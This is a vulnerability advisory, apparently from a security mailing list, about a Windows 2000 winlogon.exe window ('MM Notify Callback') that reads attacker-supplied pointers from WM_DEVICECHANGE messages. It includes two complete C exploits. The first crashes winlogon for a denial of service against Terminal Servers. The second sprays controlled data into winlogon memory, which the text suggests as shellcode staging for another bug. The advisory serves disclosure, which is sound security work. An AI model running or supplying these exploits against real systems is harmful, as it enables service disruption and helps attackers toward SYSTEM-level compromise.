COMMAND

    winlogon

SYSTEMS AFFECTED

    Win2000

PROBLEM

    'ryagin'  found  following.   As  well  as  recent  "NetDDE Agent"
    window hosted by winlogon.exe, there  is one another window:   "MM
    Notify Callback".  It is hosted by winmm.dll which is loaded  into
    winlogon.exe.

    Windows  procedure  seems  to  handle  few  messages,   WM_CREATE,
    WM_DESTROY,  WM_CLOSE,  WM_TIMER,   and,  the  most   interesting,
    WM_DEVICECHANGE.

    The  primary  role  of  WM_DEVICECHANGE  message  is informing the
    user-space  environment  about  device  plug/unplug  and   related
    issues.

    The "MM Notify Callback" window analyses only "MM Notify Callback"
    DBT_DEVICEARRIVAL [0x8000]  and DBT_DEVICEREMOVECOMPLETE  [0x8004]
    sub-messages (arriving from wParam).

    When it gots this messages, it reads data structure,  interpreting
    lParam as pointer.  Data  structure must have value 0x00000005  at
    offset+0x4 and  must have  special GUID  value at  offset+0xC, and
    must have null-terminated uncode string ot offset+0x1C.

    This  issue  most  probably  cannot  serve for executing code with
    SYSTEM  priveleges,  but  this  requires  more  accurate research.
    Quick look at winmm.dll code shows that supplied structure doesn't
    used in copy operations into random memory addresses, however, you
    can  fill  region  of  winlogon's  memory  with  practically   any
    user-supplied data  (the only  prohibited value  is unicode 0x0000
    string terminator).

    This can  be used  as shellcode  for another  winlogon's bug,  for
    example.   Nevertheless,  by  running  exploit  from the bottom of
    message, you can crash winlogon.exe with access violation.

    Thus have little value for ordinary Workstations and Servers,  but
    can be used to DoS against Terminal Servers.

    Exploit 1: crashes winlogon with access violation
    Exploit 2: inject data string of 'ABCD' x 0x1000 (in unicode) into
               winlogon memory space

    ----- exploit 1-------
    #include <windows.h>
    #include <stdio.h>
    
    DWORD exploit[]={0x11223344,0x5, 0x55667788,
      0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
    };
    
    int main()
    {
      HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
      printf("Window=%x\n",hwnd);
      SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,0x00000000);
      // 							  ^^^^^^^^^^ AV address
      return 0;
    }
    
    ----- exploit 2-------
    #include <windows.h>
    #include <stdio.h>
    
    DWORD exploit[]={0x11223344,0x5, 0x55667788,
      0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
    };
    
    int main()
    {
      DWORD *ptr;
      DWORD i,j;
      HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
      printf("Window=%x\n",hwnd);
      ptr = (DWORD*)malloc(0x1000*4+sizeof(exploit));
      for(i=0;i<sizeof(exploit)/sizeof(exploit[0]);i++)
        ptr[i]=exploit[i];
    
      for(j=0;j<0x1000;j++) ptr[i+j]='ABCD';
    
    
      SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,(DWORD)ptr);
      return 0;
    }

SOLUTION

    Nothing yet.